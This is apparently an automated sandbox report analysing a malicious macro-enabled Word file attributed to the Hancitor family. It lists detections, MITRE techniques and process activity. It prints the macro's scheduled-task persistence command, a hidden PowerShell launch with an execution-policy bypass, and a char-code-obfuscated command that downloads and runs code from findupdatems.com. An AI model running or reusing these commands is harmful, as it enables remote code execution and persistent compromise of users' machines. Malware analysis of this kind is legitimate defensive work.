Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report 18#U042f.doc

Overview

General Information

Joe Sandbox Version:24.0.0 Fire Opal
Analysis ID:64199
Start date:17.11.2018
Start time:22:53:54
Joe Sandbox Product:Cloud
Overall analysis duration:0h 11m 59s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:18#U042f.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:W10 Native physical Machine for testing VM-aware malware (Office 2010, Java 1.8.0_91, Flash 22.0.0.192, Acrobat Reader DC 15.016.20039, Internet Explorer 11, Chrome 55, Firefox 50)
Number of analysed new started processes analysed:20
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.expl.evad.winDOC@25/12@1/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Simulate clicks
  • Number of clicks 343
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, OSPPSVC.EXE
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

All domains contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work
Sample might require command line arguments, analyze it with the command line cookbook
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsCommand-Line Interface11Scheduled Task1Process Injection11Disabling Security Tools1Credential DumpingProcess Discovery1Application Deployment SoftwareData from Local SystemData CompressedStandard Non-Application Layer Protocol1
Replication Through Removable MediaScheduled Task1Port MonitorsScheduled Task1Process Injection11Network SniffingSecurity Software Discovery211Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol1
Drive-by CompromisePowerShell1Accessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic Protocol
Exploit Public-Facing ApplicationScripting32System FirmwareDLL Search Order HijackingScripting32Credentials in FilesSystem Information Discovery12Logon ScriptsInput CaptureData EncryptedMultiband Communication
Spearphishing LinkExploitation for Client Execution11Shortcut ModificationFile System Permissions WeaknessMasqueradingAccount ManipulationRemote System DiscoveryShared WebrootData StagedScheduled TransferStandard Cryptographic Protocol

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for submitted fileShow sources
Source: 18#U042f.docAvira: Label: W97M/Hancitor.hwhzo
Multi AV Scanner detection for submitted fileShow sources
Source: 18#U042f.docvirustotal: Detection: 61%Perma Link
Yara signature matchShow sources
Source: 00000007.00000002.2369970087.058E0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000C.00000002.2380851729.06F8A000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000C.00000003.2186142865.005BA000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000007.00000002.2365632769.00600000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000007.00000002.2365595933.005DE000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000C.00000002.2374595497.00910000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\schtasks.exeJump to behavior
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: findupdatems.com

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2026620 ET TROJAN Hades APT Domain in DNS Lookup (findupdatems .com) 192.168.0.60:59807 -> 8.8.8.8:53
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)Show sources
Source: unknownDNS traffic detected: query: findupdatems.com replaycode: Server failure (2)
Found strings which match to known social media urlsShow sources
Source: powershell.exe, 0000000C.00000002.2373521067.004F0000.00000004.sdmpString found in binary or memory: Microsoft.AspNet.Mvc.Facebook equals www.facebook.com (Facebook)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: findupdatems.com
Urls found in memory or binary dataShow sources
Source: powershell.exe, 0000000C.00000003.2186142865.005BA000.00000004.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000C.00000003.2186142865.005BA000.00000004.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://findupdatems.com
Source: powershell.exe, 0000000C.00000002.2378942518.05347000.00000004.sdmp, PowerShell_transcript.424505.Y2llNals.20181118102015.txt.12.drString found in binary or memory: http://findupdatems.com/ch
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://findupdatems.com/check/index
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://findupdatems.com/check/indexHlj)4jzIEX$
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://findupdatems.com/check/indexd
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Management.Automation
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Management.Automationl
Source: powershell.exe, 0000000C.00000002.2377895660.04D60000.00000004.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 18#U042f.docString found in binary or memory: http://shopster.ua
Source: 18#U042f.docString found in binary or memory: http://shopster.ua/
Source: powershell.exe, 0000000C.00000002.2383934340.08D20000.00000004.sdmpString found in binary or memory: http://www.microsoft.c

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function NAPHLPR, API IWshShell3.Run("schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta C:\Users\user\AppData\Roaming\WPFT532.hta"",0:Integer,True)Name: NAPHLPR
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function NAPHLPR, API IWshShell3.Run("schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta C:\Users\user\AppData\Roaming\WPFT532.hta"",0:Integer,True)Name: NAPHLPR
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: 18#U042f.docOLE, VBA macro line: KYC2525E = Environ(MSART8("FUUIFYF"))
Source: 18#U042f.docOLE, VBA macro line: Set kerberos = objFSO.CreateTextFile(KYC2525E & KBDUGHR1, True)
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Frame1_Layout, String WsCRiPT.ShellName: Frame1_Layout
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function fixer_base, String schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta random_name"Name: fixer_base
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function fixer_base, String schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta random_name"Name: fixer_base
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, String PowERsheLl_iSEName: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function J0289430, String \WPFT532.htaName: J0289430
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function J0289430, String environ: KYC2525E = Environ(MSART8("FUUIFYF"))Name: J0289430
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function J0289430, String createtextfile: Set kerberos = objFSO.CreateTextFile(KYC2525E & KBDUGHR1, True)Name: J0289430
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)Show sources
Source: 18#U042f.docStream path 'Macros/VBA/ThisDocument' : found possibly 'WScript.Shell' functions exec, run, environ
Document contains an ObjectPool stream indicating possible embedded files or OLE objectsShow sources
Source: 18#U042f.docOLE indicator, ObjectPool: true
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: 18#U042f.docOLE, VBA macro line: Sub Frame1_Layout()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Frame1_LayoutName: Frame1_Layout
Document contains embedded VBA macrosShow sources
Source: 18#U042f.docOLE indicator, VBA macros: true
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.expl.evad.winDOC@25/12@1/0
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR654D.tmpJump to behavior
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
Source: 18#U042f.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
Source: 18#U042f.docOLE document summary: title field not present or empty
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\35849a60913000fe067eb742f5cabec9\mscorlib.ni.dllJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - root\ciMV2 : SELECT NamE FROM WIn32_PRoCEsS
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - root\ciMV2 : SELECT NamE FROM WIn32_PRoCEsS
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - root\ciMV2 : SELECT NamE FROM WIn32_PRoCEsS
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - root\ciMV2 : SELECT NamE FROM WIn32_PRoCEsS
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\splwow64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: 18#U042f.docvirustotal: Detection: 61%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\18#U042f.doc
Source: unknownProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Roaming\WPFT532.hta
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe '
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq%Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe 'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\splwow64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a06-f192-11d4-a65f-0040963251e5}\InProcServer32Jump to behavior
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9177_none_5093cc7abcb795e9\MSVCR90.dllJump to behavior

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50Jump to behavior
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -
